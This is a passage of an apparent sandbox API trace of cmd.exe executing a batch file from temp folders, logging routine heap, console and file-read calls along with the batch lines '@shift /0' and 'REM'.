lpConsoleTitle=0x21ed8c71170, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0097.290] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x7ffce9120000 [0097.290] GetProcAddress (hModule=0x7ffce9120000, lpProcName="CopyFileExW") returned 0x7ffce913e830 [0097.290] GetProcAddress (hModule=0x7ffce9120000, lpProcName="IsDebuggerPresent") returned 0x7ffce913e300 [0097.290] GetProcAddress (hModule=0x7ffce9120000, lpProcName="SetConsoleInputExeNameW") returned 0x7ffce6900a40 [0097.290] ??_V@YAXPEAX@Z () returned 0x1 [0097.292] GetProcessHeap () returned 0x21ed8c70000 [0097.292] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8c79340 [0097.292] GetProcessHeap () returned 0x21ed8c70000 [0097.292] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c79340) returned 1 [0097.297] _wcsicmp (_String1="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\AC92.tmp\\ACA2.tmp\\ACA3.bat", _String2=")") returned 58 [0097.297] _wcsicmp (_String1="FOR", _String2="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\AC92.tmp\\ACA2.tmp\\ACA3.bat") returned 3 [0097.297] _wcsicmp (_String1="FOR/?", _String2="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\AC92.tmp\\ACA2.tmp\\ACA3.bat") returned 3 [0097.297] _wcsicmp (_String1="IF", _String2="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\AC92.tmp\\ACA2.tmp\\ACA3.bat") returned 6 [0097.297] _wcsicmp (_String1="IF/?", _String2="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\AC92.tmp\\ACA2.tmp\\ACA3.bat") returned 6 [0097.297] _wcsicmp (_String1="REM", _String2="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\AC92.tmp\\ACA2.tmp\\ACA3.bat") returned 15 [0097.297] _wcsicmp (_String1="REM/?", _String2="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\AC92.tmp\\ACA2.tmp\\ACA3.bat") returned 15 [0097.297] GetProcessHeap () returned 0x21ed8c70000 [0097.297] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb0) returned 0x21ed8c71390 [0097.297] GetProcessHeap () returned 0x21ed8c70000 [0097.297] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x8c) returned 0x21ed8c71450 [0097.299] GetProcessHeap () returned 0x21ed8c70000 [0097.299] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb2) returned 0x21ed8c714f0 [0097.300] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4ff440, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0097.301] malloc (_Size=0xffce) returned 0x21ed8e60060 [0097.301] ??_V@YAXPEAX@Z () returned 0x21ed8e60060 [0097.302] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0097.302] malloc (_Size=0xffce) returned 0x21ed8e70040 [0097.302] ??_V@YAXPEAX@Z () returned 0x21ed8e70040 [0097.303] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0097.303] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x21ed8e70040, nVolumeNameSize=0x7fe7, lpVolumeSerialNumber=0xa6cf4fef90, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xa6cf4fef90*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0097.307] ??_V@YAXPEAX@Z () returned 0x1 [0097.307] GetProcessHeap () returned 0x21ed8c70000 [0097.308] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed8c853a0 [0097.309] GetProcessHeap () returned 0x21ed8c70000 [0097.309] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x12e) returned 0x21ed8c715b0 [0097.309] _wcsnicmp (_String1="C:\\U", _String2="cmd ", _MaxCount=0x4) returned -51 [0097.309] malloc (_Size=0xffce) returned 0x21ed8e70040 [0097.309] ??_V@YAXPEAX@Z () returned 0x21ed8e70040 [0097.309] GetProcessHeap () returned 0x21ed8c70000 [0097.309] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1ffac) returned 0x21ed8c95390 [0097.311] SetErrorMode (uMode=0x0) returned 0x0 [0097.311] SetErrorMode (uMode=0x1) returned 0x0 [0097.311] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\AC92.tmp\\ACA2.tmp\\.", nBufferLength=0xffce, lpBuffer=0x21ed8c953a0, lpFilePart=0xa6cf4fecc0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\AC92.tmp\\ACA2.tmp", lpFilePart=0xa6cf4fecc0*="ACA2.tmp") returned 0x34 [0097.311] SetErrorMode (uMode=0x0) returned 0x1 [0097.312] GetProcessHeap () returned 0x21ed8c70000 [0097.312] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c95390, Size=0x8c) returned 0x21ed8c95390 [0097.312] GetProcessHeap () returned 0x21ed8c70000 [0097.312] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c95390) returned 0x8c [0097.312] NeedCurrentDirectoryForExePathW (ExeName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\AC92.tmp\\ACA2.tmp\\.") returned 1 [0097.312] GetProcessHeap () returned 0x21ed8c70000 [0097.312] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x80) returned 0x21ed8c716f0 [0097.312] GetProcessHeap () returned 0x21ed8c70000 [0097.312] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xec) returned 0x21ed8c71780 [0097.312] GetProcessHeap () returned 0x21ed8c70000 [0097.312] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c71780, Size=0x80) returned 0x21ed8c71780 [0097.312] GetProcessHeap () returned 0x21ed8c70000 [0097.312] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c71780) returned 0x80 [0097.312] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0097.312] GetProcessHeap () returned 0x21ed8c70000 [0097.312] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xe8) returned 0x21ed8c71810 [0097.316] GetProcessHeap () returned 0x21ed8c70000 [0097.316] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c71810, Size=0x7e) returned 0x21ed8c71810 [0097.316] GetProcessHeap () returned 0x21ed8c70000 [0097.316] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c71810) returned 0x7e [0097.316] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0097.316] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\AC92.tmp\\ACA2.tmp\\ACA3.bat", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fea30, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fea30) returned 0x21ed8c718a0 [0097.317] GetProcessHeap () returned 0x21ed8c70000 [0097.317] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x0, Size=0x28) returned 0x21ed8c787c0 [0097.317] FindClose (in: hFindFile=0x21ed8c718a0 | out: hFindFile=0x21ed8c718a0) returned 1 [0097.317] _wcsicmp (_String1=".bat", _String2=".CMD") returned -1 [0097.317] _wcsicmp (_String1=".bat", _String2=".BAT") returned 0 [0097.317] ??_V@YAXPEAX@Z () returned 0x1 [0097.317] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fefb0, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0097.318] GetProcessHeap () returned 0x21ed8c70000 [0097.318] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1e8) returned 0x21ed8c718a0 [0097.318] malloc (_Size=0xffce) returned 0x21ed8e70040 [0097.318] ??_V@YAXPEAX@Z () returned 0x21ed8e70040 [0097.318] ApiSetQueryApiSetPresence () returned 0x0 [0097.318] ResolveDelayLoadedAPI () returned 0x7ffccb281090 [0097.577] SaferWorker () returned 0x0 [0097.689] SetErrorMode (uMode=0x0) returned 0x0 [0097.689] SetErrorMode (uMode=0x1) returned 0x0 [0097.689] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\AC92.tmp\\ACA2.tmp\\ACA3.bat", nBufferLength=0x7fe7, lpBuffer=0x21ed8c853b0, lpFilePart=0xa6cf4feb70 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\AC92.tmp\\ACA2.tmp\\ACA3.bat", lpFilePart=0xa6cf4feb70*="ACA3.bat") returned 0x3d [0097.689] SetErrorMode (uMode=0x0) returned 0x1 [0097.689] malloc (_Size=0x4000) returned 0x21ed8e45540 [0097.690] GetProcessHeap () returned 0x21ed8c70000 [0097.690] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x8c) returned 0x21ed8c7b940 [0097.690] wcsspn (_String=" \"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe\"", _Control=" \x09") returned 0x1 [0097.690] GetProcessHeap () returned 0x21ed8c70000 [0097.690] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb0) returned 0x21ed8c7c1f0 [0097.690] GetProcessHeap () returned 0x21ed8c70000 [0097.690] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x150) returned 0x21ed8c7c2b0 [0097.690] GetProcessHeap () returned 0x21ed8c70000 [0097.690] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c7c2b0, Size=0xb2) returned 0x21ed8c7c2b0 [0097.690] GetProcessHeap () returned 0x21ed8c70000 [0097.690] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c7c2b0) returned 0xb2 [0097.690] ??_V@YAXPEAX@Z () returned 0x1 [0097.690] CmdBatNotificationStub () returned 0x0 [0097.690] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\AC92.tmp\\ACA2.tmp\\ACA3.bat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\ac92.tmp\\aca2.tmp\\aca3.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xa6cf4fe9b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x98 [0097.691] _open_osfhandle (_OSFileHandle=0x98, _Flags=8) returned 3 [0097.691] _get_osfhandle (_FileHandle=3) returned 0x98 [0097.691] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.691] _get_osfhandle (_FileHandle=3) returned 0x98 [0097.691] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.691] ReadFile (in: hFile=0x98, lpBuffer=0x7ff66c5c9970, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xa6cf4fe970, lpOverlapped=0x0 | out: lpBuffer=0x7ff66c5c9970*, lpNumberOfBytesRead=0xa6cf4fe970*=0x4fd, lpOverlapped=0x0) returned 1 [0097.692] SetFilePointer (in: hFile=0x98, lDistanceToMove=11, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xb [0097.692] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff66c5c9970, cbMultiByte=11, lpWideCharStr=0x7ff66c5d3c30, cchWideChar=8191 | out: lpWideCharStr="@shift /0\r\n") returned 11 [0097.692] _get_osfhandle (_FileHandle=3) returned 0x98 [0097.692] GetFileType (hFile=0x98) returned 0x1 [0097.692] _get_osfhandle (_FileHandle=3) returned 0x98 [0097.692] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xb [0097.692] GetProcessHeap () returned 0x21ed8c70000 [0097.692] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8c95430 [0097.693] GetProcessHeap () returned 0x21ed8c70000 [0097.693] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c95430) returned 1 [0097.693] GetProcessHeap () returned 0x21ed8c70000 [0097.693] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb0) returned 0x21ed8c7c380 [0097.694] _wcsicmp (_String1="shift", _String2=")") returned 74 [0097.694] _wcsicmp (_String1="FOR", _String2="shift") returned -13 [0097.694] _wcsicmp (_String1="FOR/?", _String2="shift") returned -13 [0097.694] _wcsicmp (_String1="IF", _String2="shift") returned -10 [0097.694] _wcsicmp (_String1="IF/?", _String2="shift") returned -10 [0097.694] _wcsicmp (_String1="REM", _String2="shift") returned -1 [0097.694] _wcsicmp (_String1="REM/?", _String2="shift") returned -1 [0097.694] GetProcessHeap () returned 0x21ed8c70000 [0097.694] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb0) returned 0x21ed8c7c440 [0097.694] GetProcessHeap () returned 0x21ed8c70000 [0097.694] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1c) returned 0x21ed8c774f0 [0097.694] GetProcessHeap () returned 0x21ed8c70000 [0097.694] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x18) returned 0x21ed8c7b340 [0097.698] _tell (_FileHandle=3) returned 11 [0097.698] _close (_FileHandle=3) returned 0 [0097.699] malloc (_Size=0xffce) returned 0x21ed8e80160 [0097.699] ??_V@YAXPEAX@Z () returned 0x21ed8e80160 [0097.700] _wcsicmp (_String1="shift", _String2="DIR") returned 15 [0097.700] _wcsicmp (_String1="shift", _String2="ERASE") returned 14 [0097.700] _wcsicmp (_String1="shift", _String2="DEL") returned 15 [0097.700] _wcsicmp (_String1="shift", _String2="TYPE") returned -1 [0097.700] _wcsicmp (_String1="shift", _String2="COPY") returned 16 [0097.700] _wcsicmp (_String1="shift", _String2="CD") returned 16 [0097.700] _wcsicmp (_String1="shift", _String2="CHDIR") returned 16 [0097.700] _wcsicmp (_String1="shift", _String2="RENAME") returned 1 [0097.700] _wcsicmp (_String1="shift", _String2="REN") returned 1 [0097.700] _wcsicmp (_String1="shift", _String2="ECHO") returned 14 [0097.700] _wcsicmp (_String1="shift", _String2="SET") returned 3 [0097.700] _wcsicmp (_String1="shift", _String2="PAUSE") returned 3 [0097.700] _wcsicmp (_String1="shift", _String2="DATE") returned 15 [0097.700] _wcsicmp (_String1="shift", _String2="TIME") returned -1 [0097.700] _wcsicmp (_String1="shift", _String2="PROMPT") returned 3 [0097.700] _wcsicmp (_String1="shift", _String2="MD") returned 6 [0097.700] _wcsicmp (_String1="shift", _String2="MKDIR") returned 6 [0097.700] _wcsicmp (_String1="shift", _String2="RD") returned 1 [0097.700] _wcsicmp (_String1="shift", _String2="RMDIR") returned 1 [0097.700] _wcsicmp (_String1="shift", _String2="PATH") returned 3 [0097.700] _wcsicmp (_String1="shift", _String2="GOTO") returned 12 [0097.700] _wcsicmp (_String1="shift", _String2="SHIFT") returned 0 [0097.700] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe760, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0097.704] malloc (_Size=0xffce) returned 0x21ed8e90140 [0097.705] ??_V@YAXPEAX@Z () returned 0x21ed8e90140 [0097.705] malloc (_Size=0xffce) returned 0x21ed8ea0120 [0097.706] ??_V@YAXPEAX@Z () returned 0x21ed8ea0120 [0097.707] _wcsicmp (_String1="shift", _String2="DIR") returned 15 [0097.707] _wcsicmp (_String1="shift", _String2="ERASE") returned 14 [0097.707] _wcsicmp (_String1="shift", _String2="DEL") returned 15 [0097.707] _wcsicmp (_String1="shift", _String2="TYPE") returned -1 [0097.707] _wcsicmp (_String1="shift", _String2="COPY") returned 16 [0097.707] _wcsicmp (_String1="shift", _String2="CD") returned 16 [0097.707] _wcsicmp (_String1="shift", _String2="CHDIR") returned 16 [0097.707] _wcsicmp (_String1="shift", _String2="RENAME") returned 1 [0097.707] _wcsicmp (_String1="shift", _String2="REN") returned 1 [0097.707] _wcsicmp (_String1="shift", _String2="ECHO") returned 14 [0097.707] _wcsicmp (_String1="shift", _String2="SET") returned 3 [0097.707] _wcsicmp (_String1="shift", _String2="PAUSE") returned 3 [0097.707] _wcsicmp (_String1="shift", _String2="DATE") returned 15 [0097.707] _wcsicmp (_String1="shift", _String2="TIME") returned -1 [0097.707] _wcsicmp (_String1="shift", _String2="PROMPT") returned 3 [0097.707] _wcsicmp (_String1="shift", _String2="MD") returned 6 [0097.707] _wcsicmp (_String1="shift", _String2="MKDIR") returned 6 [0097.707] _wcsicmp (_String1="shift", _String2="RD") returned 1 [0097.707] _wcsicmp (_String1="shift", _String2="RMDIR") returned 1 [0097.707] _wcsicmp (_String1="shift", _String2="PATH") returned 3 [0097.707] _wcsicmp (_String1="shift", _String2="GOTO") returned 12 [0097.707] _wcsicmp (_String1="shift", _String2="SHIFT") returned 0 [0097.707] ??_V@YAXPEAX@Z () returned 0x1 [0097.708] GetProcessHeap () returned 0x21ed8c70000 [0097.708] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x20) returned 0x21ed8c77830 [0097.708] GetProcessHeap () returned 0x21ed8c70000 [0097.708] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c77830, Size=0x1a) returned 0x21ed8c77830 [0097.708] GetProcessHeap () returned 0x21ed8c70000 [0097.708] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c77830) returned 0x1a [0097.708] GetProcessHeap () returned 0x21ed8c70000 [0097.708] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x24) returned 0x21ed8c7c500 [0097.709] ??_V@YAXPEAX@Z () returned 0x1 [0097.709] _get_osfhandle (_FileHandle=1) returned 0x50 [0097.709] SetConsoleMode (hConsoleHandle=0x50, dwMode=0x7) returned 1 [0097.710] _get_osfhandle (_FileHandle=1) returned 0x50 [0097.710] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0x7ff66c5cfc08 | out: lpMode=0x7ff66c5cfc08) returned 1 [0097.710] _get_osfhandle (_FileHandle=0) returned 0x4c [0097.710] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x7ff66c5cfc0c | out: lpMode=0x7ff66c5cfc0c) returned 1 [0097.710] SetConsoleInputExeNameW () returned 0x1 [0097.710] GetConsoleOutputCP () returned 0x1b5 [0097.711] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff66c5cfbb0 | out: lpCPInfo=0x7ff66c5cfbb0) returned 1 [0097.711] SetThreadUILanguage (LangId=0x0) returned 0x409 [0097.711] ??_V@YAXPEAX@Z () returned 0x1 [0097.713] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\AC92.tmp\\ACA2.tmp\\ACA3.bat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\ac92.tmp\\aca2.tmp\\aca3.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xa6cf4fe9b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x98 [0097.713] _open_osfhandle (_OSFileHandle=0x98, _Flags=8) returned 3 [0097.713] _get_osfhandle (_FileHandle=3) returned 0x98 [0097.713] SetFilePointer (in: hFile=0x98, lDistanceToMove=11, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xb [0097.713] GetProcessHeap () returned 0x21ed8c70000 [0097.713] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c7c500) returned 1 [0097.713] GetProcessHeap () returned 0x21ed8c70000 [0097.713] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c77830) returned 1 [0097.713] GetProcessHeap () returned 0x21ed8c70000 [0097.713] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c7b340) returned 1 [0097.713] GetProcessHeap () returned 0x21ed8c70000 [0097.713] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c774f0) returned 1 [0097.713] GetProcessHeap () returned 0x21ed8c70000 [0097.713] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c7c440) returned 1 [0097.713] GetProcessHeap () returned 0x21ed8c70000 [0097.713] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c7c380) returned 1 [0097.713] _get_osfhandle (_FileHandle=3) returned 0x98 [0097.713] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xb [0097.714] ReadFile (in: hFile=0x98, lpBuffer=0x7ff66c5c9970, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xa6cf4fe970, lpOverlapped=0x0 | out: lpBuffer=0x7ff66c5c9970*, lpNumberOfBytesRead=0xa6cf4fe970*=0x4f2, lpOverlapped=0x0) returned 1 [0097.714] SetFilePointer (in: hFile=0x98, lDistanceToMove=16, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x10 [0097.714] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff66c5c9970, cbMultiByte=5, lpWideCharStr=0x7ff66c5d3c30, cchWideChar=8191 | out: lpWideCharStr="REM\r\nt /0\r\n") returned 5 [0097.714] _get_osfhandle (_FileHandle=3) returned 0x98 [0097.714] GetFileType (hFile=0x98) returned 0x1 [0097.714] _get_osfhandle (_FileHandle=3) returned 0x98 [0097.714] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x10 [0097.714] GetProcessHeap () returned 0x21ed8c70000 [0097.714] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8c95430 [0097.714] GetProcessHeap () returned 0x21ed8c70000 [0097.714] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c95430) returned 1 [0097.714] _wcsicmp (_String1="REM", _String2=")") returned 73 [0097.714] _wcsicmp (_String1="FOR", _String2="REM") returned -12 [0097.714] _wcsicmp (_String1="FOR/?", _String2="REM") returned -12 [0097.714] _wcsicmp (_String1="IF", _String2="REM") returned -9 [0097.714] _wcsicmp (_String1="IF/?", _String2="REM") returned -9 [0097.715] _wcsicmp (_String1="REM", _String2="REM") returned 0 [0097.715] _wcsicmp (_String1="REM/?", _String2="REM") returned 47 [0097.715] GetProcessHeap () returned 0x21ed8c70000 [0097.715] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb0) returned 0x21ed8c7c380 [0097.715] GetProcessHeap () returned 0x21ed8c70000 [0097.715] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x18) returned 0x21ed8c7b340 [0097.715] GetProcessHeap () returned 0x21ed8c70000 [0097.715] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x18) returned 0x21ed8c7b100 [0097.715] GetProcessHeap () returned 0x21ed8c70000 [0097.715] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c7b100, Size=0x14) returned 0x21ed8c7b300 [0097.715] GetProcessHeap () returned 0x21ed8c70000 [0097.715] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c7b300) returned 0x14 [0097.716] _tell (_FileHandle=3) returned 16 [0097.716] _close (_FileHandle=3) returned 0 [0097.766] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe748 | out: _Buffer="\r\n") returned 2 [0097.766] _get_osfhandle (_FileHandle=1) returned 0x50 [0097.766] GetFileType (hFile=0x50) returned 0x2 [0097.767] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0097.767] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe6d8 | out: lpMode=0xa6cf4fe6d8) returned 1 [0097.770] _get_osfhandle (_FileHandle=1) returned 0x50 [0097.770] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe718, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe718*=0x2) returned 1 [0097.772] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0097.772] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0097.772] malloc (_Size=0x107ce) returned 0x21ed8e80160 [0097.773] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe758 | out: _Buffer="C:\\Users\\FD1HVy\\Desktop") returned 23 [0097.773] _vsnwprintf (in: _Buffer=0x21ed8e8018e, _BufferCount=0x83ce, _Format="%c", _ArgList=0xa6cf4fe758 | out: _Buffer=">") returned 1 [0097.773] _get_osfhandle (_FileHandle=1) returned 0x50 [0097.773] GetFileType (hFile=0x50) returned 0x2 [0097.773] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0097.774] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe708 | out: lpMode=0xa6cf4fe708) returned 1 [0097.774] _get_osfhandle (_FileHandle=1) returned 0x50 [0097.774] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x18, lpNumberOfCharsWritten=0xa6cf4fe748, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe748*=0x18) returned 1 [0098.685] _get_osfhandle (_FileHandle=1) returned 0x50 [0098.685] GetFileType (hFile=0x50) returned 0x2 [0098.685] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0098.685] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe9d8 | out: lpMode=0xa6cf4fe9d8) returned 1 [0098.710] _get_osfhandle (_FileHandle=1) returned 0x50 [0098.710] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8c7b350*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fea18, lpReserved=0x0 | out: lpBuffer=0x21ed8c7b350*, lpNumberOfCharsWritten=0xa6cf4fea18*=0x3) returned 1 [0098.711] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fea48 | out: _Buffer="\r\n") returned 2 [0098.711] _get_osfhandle (_FileHandle=1) returned 0x50 [0098.711] GetFileType (hFile=0x50) returned 0x2 [0098.712] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0098.712] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe9d8 | out: lpMode=0xa6cf4fe9d8) returned 1 [0098.712] _get_osfhandle (_FileHandle=1) returned 0x50 [0098.712] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fea18, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fea18*=0x2) returned 1 [0098.712] malloc (_Size=0xffce) returned 0x21ed8e90940 [0098.713] ??_V@YAXPEAX@Z () returned 0x21ed8e90940 [0098.713] _get_osfhandle (_FileHandle=1) returned 0x50 [0098.714] SetConsoleMode (hConsoleHandle=0x50, dwMode=0x7) returned 1 [0098.715] 